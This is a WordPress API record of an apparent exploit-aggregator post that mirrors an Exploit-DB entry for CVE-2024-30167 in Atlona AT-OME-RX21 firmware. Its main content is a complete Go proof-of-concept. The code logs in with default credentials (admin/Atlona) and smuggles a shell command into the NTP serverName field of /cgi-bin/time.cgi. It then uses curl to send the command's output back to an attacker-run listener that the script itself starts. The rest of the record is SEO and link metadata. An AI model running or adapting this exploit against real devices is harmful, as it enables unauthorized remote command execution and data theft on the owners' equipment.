{"id":50077,"date":"2026-04-29T00:37:33","date_gmt":"2026-04-29T00:37:33","guid":{"rendered":"http:\/\/localhost\/?p=50077"},"modified":"2026-04-29T00:37:33","modified_gmt":"2026-04-29T00:37:33","slug":"atlona-atomerx21-authenticated-command-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=50077","title":{"rendered":"Atlona ATOMERX21 – Authenticated Command Injection_EDB-ID:52513"},"content":{"rendered":"

{“lastseen”:”2026-04-29T05:27:57″,”description”:”\/\/ Exploit Title: Atlona AT-OME-RX21 Authenticated Command Injection \/\/ Google Dork: N\/A \/\/ Date: 2025-12-28 \/\/ Exploit Author: RIZZZIOM \/\/ Vendor Homepage: https:\/\/atlona.com \/\/ Software Link: https:\/\/atlona.com\/product\/at-ome-rx21\/ \/\/ Version:…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”exploitdb”,”title”:”Atlona ATOMERX21 – Authenticated Command Injection”,”source”:””,”references”:””,”id”:”EDB-ID:52513″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-30167″],”sourceData”:”\/\/ Exploit Title: Atlona AT-OME-RX21 Authenticated Command Injection\\r\\n\/\/ Google Dork: N\/A\\r\\n\/\/ Date: 2025-12-28\\r\\n\/\/ Exploit Author: RIZZZIOM\\r\\n\/\/ Vendor Homepage: https:\/\/atlona.com\\r\\n\/\/ Software Link: https:\/\/atlona.com\/product\/at-ome-rx21\/\\r\\n\/\/ Version: Firmware \\u003c= 1.5.1\\r\\n\/\/ Tested on: AT-OME-RX21 Embedded Firmware (1.5.0, 1.5.1)\\r\\n\/\/ CVE : CVE-2024-30167\\r\\n\/\/ Usage: go run main.go -t \\u003ctarget_uri\\u003e -u \\u003cusername\\u003e -p \\u003cpassword\\u003e -l \\u003clhost\\u003e -P \\u003clport\\u003e -c \\u003ccommand\\u003e\\r\\npackage main\\r\\n\\r\\nimport (\\r\\n\\t\\”bytes\\”\\r\\n\\t\\”context\\”\\r\\n\\t\\”encoding\/base64\\”\\r\\n\\t\\”flag\\”\\r\\n\\t\\”fmt\\”\\r\\n\\t\\”io\\”\\r\\n\\t\\”net\/http\\”\\r\\n\\t\\”os\\”\\r\\n\\t\\”os\/signal\\”\\r\\n\\t\\”strings\\”\\r\\n\\t\\”syscall\\”\\r\\n\\t\\”time\\”\\r\\n)\\r\\n\\r\\nfunc main() {\\r\\n\\tbanner := `\\r\\n\\t\\t \\r\\n \\r\\n\u2584\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2584 \u2584\u2588\u2588\u2584 \u2588\u2588\u2588\u2588\u2584 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2584 \u2584\u2588\u2588\u2584 \u2584\u2588\u2588 \u2584\u2588\u2588\u2580\u2580\u2580 \u2588\u2588\u2588\u2588\u2588\u2588 \\r\\n\u2588\u2588 \u2588\u2588\u2584\u2584\u2588\u2588 \u2588\u2588\u2584\u2584 \u2584\u2584\u2584 \u2584\u2588\u2588\u2580 \u2588\u2588 \u2588\u2588 \u2584\u2588\u2588\u2580 \u2580\u2588\u2588\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2584\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2584\u2584\u2584 \u2584\u2588\u2588\u2580 \\r\\n\u2580\u2588\u2588\u2588\u2588\u2588 \u2580\u2588\u2588\u2580 \u2588\u2588\u2584\u2584\u2584\u2584 \u2588\u2588\u2588\u2584\u2584 \u2580\u2588\u2588\u2580 \u2588\u2588\u2588\u2584\u2584 \u2588\u2588 \u2584\u2584\u2584\u2588\u2580 \u2580\u2588\u2588\u2580 \u2588\u2588 \u2580\u2588\u2584\u2584\u2588\u2580 \u2588\u2588\u2580 \\r\\n \\r\\n\\t\\t\\tPoC by: github.com\/RIZZZIOM\\r\\n\\t`\\r\\n\\tfmt.Println(banner)\\r\\n\\r\\n\\ttarget := flag.String(\\”t\\”, \\”\\”, \\”Target URL (e.g: http:\/\/example.com)\\”)\\r\\n\\tusername := flag.String(\\”u\\”, \\”admin\\”, \\”Username for authentication\\”)\\r\\n\\tpassword := flag.String(\\”p\\”, \\”Atlona\\”, \\”Password for authentication\\”)\\r\\n\\tlport := flag.String(\\”P\\”, \\”4444\\”, \\”listening port for command output\\”)\\r\\n\\tlhost := flag.String(\\”l\\”, \\”\\”, \\”listening host for command output\\”)\\r\\n\\tcommand := flag.String(\\”c\\”, \\”\\”, \\”Command to execute on the target\\”)\\r\\n\\r\\n\\tflag.Parse()\\r\\n\\tif *target == \\”\\” || *lhost == \\”\\” || *command == \\”\\” {\\r\\n\\t\\tfmt.Println(\\”ERROR: Missing required parameters\\”)\\r\\n\\t\\tflag.PrintDefaults()\\r\\n\\t\\tos.Exit(1)\\r\\n\\t}\\r\\n\\r\\n\\turl := strings.TrimRight(*target, \\”\/\\”) + \\”\/cgi-bin\/time.cgi\\”\\r\\n\\tlistener := *lhost + \\”:\\” + *lport\\r\\n\\r\\n\\t\/\/ Buffered channel to prevent goroutine blocking if receiver exits early\\r\\n\\tresponseChan := make(chan struct{}, 1)\\r\\n\\r\\n\\t\/\/ Create context for graceful shutdown coordination\\r\\n\\tctx, cancel := context.WithCancel(context.Background())\\r\\n\\tdefer cancel()\\r\\n\\r\\n\\t\/\/ Start HTTP server and get reference for shutdown\\r\\n\\tserver := httpServe(listener, responseChan, ctx)\\r\\n\\r\\n\\texecuteCommand(url, *username, *password, listener, *command)\\r\\n\\r\\n\\tsigChan := make(chan os.Signal, 1)\\r\\n\\tsignal.Notify(sigChan, syscall.SIGINT, syscall.SIGTERM)\\r\\n\\r\\n\\t\/\/ Timeout to prevent indefinite waiting\\r\\n\\tresponseTimeout := time.NewTimer(30 * time.Second)\\r\\n\\tdefer responseTimeout.Stop()\\r\\n\\r\\n\\tselect {\\r\\n\\tcase \\u003c-responseChan:\\r\\n\\t\\ttime.Sleep(1 * time.Second)\\r\\n\\tcase \\u003c-sigChan:\\r\\n\\t\\tfmt.Printf(\\”\\\\n===Shutting Down===\\\\n\\”)\\r\\n\\tcase \\u003c-responseTimeout.C:\\r\\n\\t\\tfmt.Println(\\”\\\\n===Response Timeout – No response received===\\”)\\r\\n\\t}\\r\\n\\r\\n\\t\/\/ Graceful server shutdown\\r\\n\\tcancel() \/\/ Signal context cancellation\\r\\n\\tshutdownCtx, shutdownCancel := context.WithTimeout(context.Background(), 5*time.Second)\\r\\n\\tdefer shutdownCancel()\\r\\n\\r\\n\\tif err := server.Shutdown(shutdownCtx); err != nil {\\r\\n\\t\\tfmt.Printf(\\”Server shutdown error: %v\\\\n\\”, err)\\r\\n\\t}\\r\\n}\\r\\n\\r\\nfunc executeCommand(url, username, password, listener, command string) {\\r\\n\\t\/\/ this func sends the commands to the target\\r\\n\\tpayload := fmt.Sprintf(`{\\”syncSntpTime\\”:{\\”serverName\\”:\\”time.google.com; curl -X POST –data \\\\\\”$(%s)\\\\\\” %s\\”}}`, command, listener)\\r\\n\\tauth := base64.StdEncoding.EncodeToString([]byte(username + \\”:\\” + password))\\r\\n\\treq, err := http.NewRequest(\\”POST\\”, url, bytes.NewBuffer([]byte(payload)))\\r\\n\\tif err != nil {\\r\\n\\t\\tpanic(err)\\r\\n\\t}\\r\\n\\treq.Header.Set(\\”User-Agent\\”, \\”Mozilla\/5.0 (Windows NT 10.0) Firefox\/143.0\\”)\\r\\n\\treq.Header.Set(\\”Content-Type\\”, \\”application\/json\\”)\\r\\n\\treq.Header.Set(\\”Authorization\\”, \\”Basic \\”+auth)\\r\\n\\treq.Header.Set(\\”X-Requested-With\\”, \\”XMLHttpRequest\\”)\\r\\n\\r\\n\\tclient := \\u0026http.Client{\\r\\n\\t\\tTimeout: 15 * time.Second,\\r\\n\\t}\\r\\n\\r\\n\\tresp, err := client.Do(req)\\r\\n\\tif err != nil {\\r\\n\\t\\tfmt.Printf(\\”ERROR: Request failed: %v\\\\n\\”, err)\\r\\n\\t\\tos.Exit(1)\\r\\n\\t}\\r\\n\\tdefer resp.Body.Close()\\r\\n\\r\\n\\tswitch resp.StatusCode {\\r\\n\\tcase 200:\\r\\n\\t\\tfmt.Println(\\”Command Injection Successful\\”)\\r\\n\\tcase 401, 403:\\r\\n\\t\\tfmt.Printf(\\”ERROR: Authentication Failed (HTTP %d)\\\\n\\”, resp.StatusCode)\\r\\n\\tcase 404:\\r\\n\\t\\tfmt.Printf(\\”ERROR: Target Endpoint Not Found.\\\\n\\”)\\r\\n\\tdefault:\\r\\n\\t\\tfmt.Printf(\\”ERROR: Unexpected Response (HTTP %d)\\\\n\\”, resp.StatusCode)\\r\\n\\t\\tbody, _ := io.ReadAll(resp.Body)\\r\\n\\t\\tif len(body) \\u003e 0 {\\r\\n\\t\\t\\tfmt.Printf(\\”Response Body: %s\\\\n\\”, string(body))\\r\\n\\t\\t}\\r\\n\\t\\tos.Exit(1)\\r\\n\\t}\\r\\n}\\r\\n\\r\\nfunc getResponse(r *http.Request, responseChan chan struct{}) {\\r\\n\\t\/\/ this function serves and http server and collects response\\r\\n\\tif r.Method != http.MethodPost {\\r\\n\\t\\tfmt.Printf(\\”Received non-POST Request(%s)\\\\n\\”, r.Method)\\r\\n\\t\\treturn\\r\\n\\t}\\r\\n\\tdefer r.Body.Close()\\r\\n\\tfmt.Println(\\”\\\\n=====Received Response=====\\”)\\r\\n\\r\\n\\tbody, err := io.ReadAll(r.Body)\\r\\n\\tif err != nil {\\r\\n\\t\\tfmt.Printf(\\”Failed To Read Response Body: %v\\\\n\\”, err)\\r\\n\\t\\treturn\\r\\n\\t}\\r\\n\\tfmt.Println(string(body))\\r\\n\\r\\n\\t\/\/ Non-blocking send to prevent goroutine deadlock\\r\\n\\tselect {\\r\\n\\tcase responseChan \\u003c- struct{}{}:\\r\\n\\tdefault:\\r\\n\\t}\\r\\n}\\r\\n\\r\\nfunc httpServe(listener string, responseChan chan struct{}, ctx context.Context) *http.Server {\\r\\n\\t\/\/ this function gets the command injection response from the custom header\\r\\n\\tmux := http.NewServeMux()\\r\\n\\tmux.HandleFunc(\\”\/\\”, func(w http.ResponseWriter, r *http.Request) {\\r\\n\\t\\tgetResponse(r, responseChan)\\r\\n\\t\\tw.WriteHeader(http.StatusNoContent)\\r\\n\\t})\\r\\n\\r\\n\\tserver := \\u0026http.Server{\\r\\n\\t\\tAddr: listener,\\r\\n\\t\\tHandler: mux,\\r\\n\\t\\tMaxHeaderBytes: 20 * 1024 * 1024,\\r\\n\\t\\tReadTimeout: 30 * time.Second,\\r\\n\\t\\tWriteTimeout: 30 * time.Second,\\r\\n\\t\\tIdleTimeout: 60 * time.Second,\\r\\n\\t}\\r\\n\\r\\n\\tfmt.Printf(\\”Listening on %s for response…\\\\n\\”, listener)\\r\\n\\r\\n\\tgo func() {\\r\\n\\t\\tif err := server.ListenAndServe(); err != nil \\u0026\\u0026 err != http.ErrServerClosed {\\r\\n\\t\\t\\tfmt.Printf(\\”ERROR: Server error: %v\\\\n\\”, err)\\r\\n\\t\\t}\\r\\n\\t}()\\r\\n\\r\\n\\treturn server\\r\\n}”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52513″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52513″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-04-29T05:27:57″,”description”:”\/\/ Exploit Title: Atlona AT-OME-RX21 Authenticated Command Injection \/\/ Google Dork: N\/A \/\/ Date: 2025-12-28 \/\/ Exploit Author: RIZZZIOM \/\/ Vendor Homepage: https:\/\/atlona.com \/\/ Software…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,40,13,33,7,11,5],"class_list":["post-50077","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-exploitdb","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nAtlona ATOMERX21 - Authenticated Command Injection_EDB-ID:52513 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=50077\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Atlona ATOMERX21 - Authenticated Command Injection_EDB-ID:52513 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-04-29T05:27:57″,”description”:”\/\/ Exploit Title: Atlona AT-OME-RX21 Authenticated Command Injection \/\/ Google Dork: N\/A \/\/ Date: 2025-12-28 \/\/ Exploit Author: RIZZZIOM \/\/ Vendor Homepage: https:\/\/atlona.com \/\/ Software...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=50077\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-29T00:37:33+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50077#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50077\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Atlona ATOMERX21 – Authenticated Command Injection_EDB-ID:52513\",\"datePublished\":\"2026-04-29T00:37:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50077\"},\"wordCount\":1237,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"exploitdb\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50077#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50077\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50077\",\"name\":\"Atlona ATOMERX21 - Authenticated Command Injection_EDB-ID:52513 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-29T00:37:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50077#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50077\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50077#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Atlona ATOMERX21 – Authenticated Command Injection_EDB-ID:52513\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Atlona ATOMERX21 - Authenticated Command Injection_EDB-ID:52513 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=50077","og_locale":"en_US","og_type":"article","og_title":"Atlona ATOMERX21 - Authenticated Command Injection_EDB-ID:52513 - zero redgem","og_description":"{“lastseen”:”2026-04-29T05:27:57″,”description”:”\/\/ Exploit Title: Atlona AT-OME-RX21 Authenticated Command Injection \/\/ Google Dork: N\/A \/\/ Date: 2025-12-28 \/\/ Exploit Author: RIZZZIOM \/\/ Vendor Homepage: https:\/\/atlona.com \/\/ Software...","og_url":"https:\/\/zero.redgem.net\/?p=50077","og_site_name":"zero redgem","article_published_time":"2026-04-29T00:37:33+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=50077#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=50077"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Atlona ATOMERX21 – Authenticated Command Injection_EDB-ID:52513","datePublished":"2026-04-29T00:37:33+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=50077"},"wordCount":1237,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","exploitdb","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=50077#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=50077","url":"https:\/\/zero.redgem.net\/?p=50077","name":"Atlona ATOMERX21 - Authenticated Command Injection_EDB-ID:52513 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-29T00:37:33+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=50077#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=50077"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=50077#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Atlona ATOMERX21 – Authenticated Command Injection_EDB-ID:52513"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50077","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=50077"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50077\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=50077"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=50077"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=50077"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}